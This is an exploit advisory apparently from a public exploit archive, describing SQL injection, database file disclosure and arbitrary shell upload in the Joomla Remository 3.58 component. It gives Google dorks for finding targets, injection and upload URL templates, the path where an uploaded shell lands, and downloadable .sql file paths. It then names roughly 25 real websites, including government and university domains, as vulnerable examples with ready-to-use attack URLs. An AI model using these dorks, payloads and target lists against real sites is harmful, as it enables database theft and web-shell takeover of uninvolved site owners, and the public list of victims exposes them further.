Joomla Remository Components 3.58 Multiple Vuln

1. ####################################################################
2.  
3. # Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 30/01/2019
7. # Vendor Homepage : remository.com
8. # Software Download Link : remository.com/downloads/joomla-3.x-software/
9. # Software Information Link : extensions.joomla.org/extension/remository/
10. # Software Version : 3.58
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # Google Dorks : inurl:''/index.php?option=com_remository''
15. inurl:''/administrator/components/com_remository/''
16. intext:Site Designed By Conservation Designs
17. intext:CCCV Gabriel Valencia site:gob.ec
18. intext:Web creada por softdream.es
19. intext:Sponsored by Innovatron - Managed by Spirtech
20. intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
21. intext:Web design by Mercury Web Solutions
22. intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
23. intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
24. # Vulnerability Type : CWE-89 [ Improper Neutralization of
25. Special Elements used in an SQL Command ('SQL Injection') ]
26. CWE-200 [ Information Exposure ]
27. CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
28. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
29. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
30. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
31. # Reference Link : cxsecurity.com/issue/WLB-2019010284
32.  
33. ####################################################################
34.  
35. # Description about Software :
36. ***************************
37.  
38. “Remository” is open source software for Joomla.
39.  
40. ####################################################################
41.  
42. # Impact :
43. ***********
44.  
45. *Attackers can exploit this issue via a browser.
46.  
47. The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers
48.  
49. upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input.
50.  
51. An attacker can exploit this vulnerability to upload arbitrary code and run it in the
52.  
53. context of the webserver process. This may facilitate unauthorized access or
54.  
55. privilege escalation; other attacks are also possible.
56.  
57. * An attacker might be able inject and/or alter existing
58.  
59. SQL statements which would influence the database exchange.
60.  
61. * SQL injection vulnerability in the Joomla Remository Components 3.58 because,
62.  
63. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
64.  
65. * Exploiting this issue could allow an attacker to compromise the application, read,
66.  
67. access or modify data, or exploit latent vulnerabilities in the underlying database.
68.  
69. If the webserver is misconfigured, read & write access to the filesystem may be possible.
70.  
71. ####################################################################
72.  
73. # SQL Injection Exploit :
74. **********************
75.  
76. /index.php?option=com_remository&Itemid=[SQL Injection]
77.  
78. /index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]
79.  
80. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
81.  
82. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
83. [ID-NUMBER]&orderby=[SQL Injection]
84.  
85. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
86.  
87. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]
88.  
89. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
90. [ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]
91.  
92. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=
93. [ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]
94.  
95. ####################################################################
96.  
97. # Arbitrary File Upload Exploit :
98. ****************************
99. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile
100.  
101. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category
102.  
103. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles
104.  
105. /index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]
106.  
107. /index.php/shared-file-repository/func-addmanyfiles/
108.  
109. Directory File Path :
110. ******************
111.  
112. Search your file here.
113.  
114. /components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php
115.  
116. /components/com_remository_files/......
117.  
118. Note : If websites are not vulnerable it says ;
119.  
120. You have no permitted upload categories - please refer to the webmaster
121.  
122. ####################################################################
123.  
124. # Database Disclosure Exploit :
125. ***************************
126.  
127. /administrator/components/com_remository/assignment.sql
128.  
129. /administrator/components/com_remository/blob.sql
130.  
131. /administrator/components/com_remository/containers.sql
132.  
133. /administrator/components/com_remository/file.sql
134.  
135. /administrator/components/com_remository/log.sql
136.  
137. /administrator/components/com_remository/permission.sql
138.  
139. /administrator/components/com_remository/repository.sql
140.  
141. /administrator/components/com_remository/reviews.sql
142.  
143. /administrator/components/com_remository/structure.sql
144.  
145. /administrator/components/com_remository/text.sql
146.  
147. ####################################################################
148.  
149. # Example Vulnerable Sites :
150. *************************
151.  
152. [+] temporalesunoa.com/dgtree/joomla/administrator/components/com_remository/repository.sql
153.  
154. [+] oceap.gov.ng/administrator/components/com_remository/remository.sql
155.  
156. [+] nacat.org/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
157.  
158. [+] jdih.mahkamahagung.go.id/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
159.  
160. [+] telecip.com.co/telecip/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
161.  
162. [+] ics-casalserugo.gov.it/joomla/index.php?option=com_remository&Itemid=78&func=fileinfo&id=40%27
163.  
164. [+] cccv.gob.ec/web/index.php?option=com_remository&Itemid=67&func=select&id=8%27
165.  
166. [+] elsemillero.net/nuevo/index.php?option=com_remository&Itemid=165%27
167.  
168. [+] pymeschamartin.softdream.es/index.php?option=com_remository
169. &Itemid=7&func=select&id=5&orderby=5&page=3%27
170.  
171. [+] ohaysoft.com/index.php?option=com_remository&Itemid=116&func=
172. download&id=149&chk=4e4f957a2083a4f41e98e5d163e7bc37&no_html=1%27
173.  
174. [+] fullthrottlesimracing.net/main/index.php?option=com_remository&Itemid=60&func=select&id=3%27
175.  
176. [+] old.tpp.pulawy.pl/index.php?option=com_remository&Itemid=49&func=fileinfo&id=36%27
177.  
178. [+] b2biaxis.com/index.php?option=com_remository&Itemid=416&func=fileinfo&id=2%27
179.  
180. [+] concretedev.com/index.php?option=com_remository&Itemid=37%27
181.  
182. [+] lexcont.de/index.php?option=com_remository&Itemid=4%27
183.  
184. [+] cnawg.net/index.php?option=com_remository&Itemid=28&func=addfile
185.  
186. [+] parachutemanuals.com/index.php?option=com_remository&Itemid=41&func=addfile&id=52
187.  
188. [+] newyork.ing.uniroma1.it/IC0902/index.php?option=com_remository&Itemid=82&func=addfile
189.  
190. [+] kline.ca/index.php?option=com_remository&Itemid=38&func=addfile&id=1
191.  
192. [+] vldb.org/vldb_journal/index.php?option=com_remository&Itemid=60&func=addfile&id=13625
193.  
194. [+] seytpe.gr/25/index.php?option=com_remository&Itemid=100088&func=addmanyfiles
195.  
196. [+] blackburnwithdarwenlink.org.uk/index.php?option=com_remository&Itemid=11&func=addfile&id=25
197.  
198. [+] station-drivers.com/index.php?option=com_remository&Itemid=353&func=addfile&id=373&lang=en
199.  
200. [+] bssb.de/index.php?func=addfile&id=1215&Itemid=647&option=com_remository&datum=01-01-2018
201.  
202. ####################################################################
203.  
204. # SQL Database Error :
205. *********************
206.  
207. Strict Standards: Non-static method JLoader::import() should not be called
208. statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29
209.  
210. Deprecated: Assigning the return value of new by reference is deprecated in
211. /home/epangsof/public_html/includes/joomla.php on line 836
212.  
213. Warning: Cannot modify header information - headers already sent by
214. (output started at /home/epangsof/public_html/includes/joomla.php:836) in
215. /home/epangsof/public_html/includes/joomla.php on line 697
216.  
217. Fatal error: Uncaught Error: Call to undefined function
218. set_magic_quotes_runtime() in /home4/hbman23/public_html/main
219. /includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html
220. /main/index.php(22): require_once() #1 {main} thrown in
221. /home4/hbman23/public_html/main/includes/framework.php on line 21
222.  
223. ####################################################################
224.  
225. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
226.  
227. ####################################################################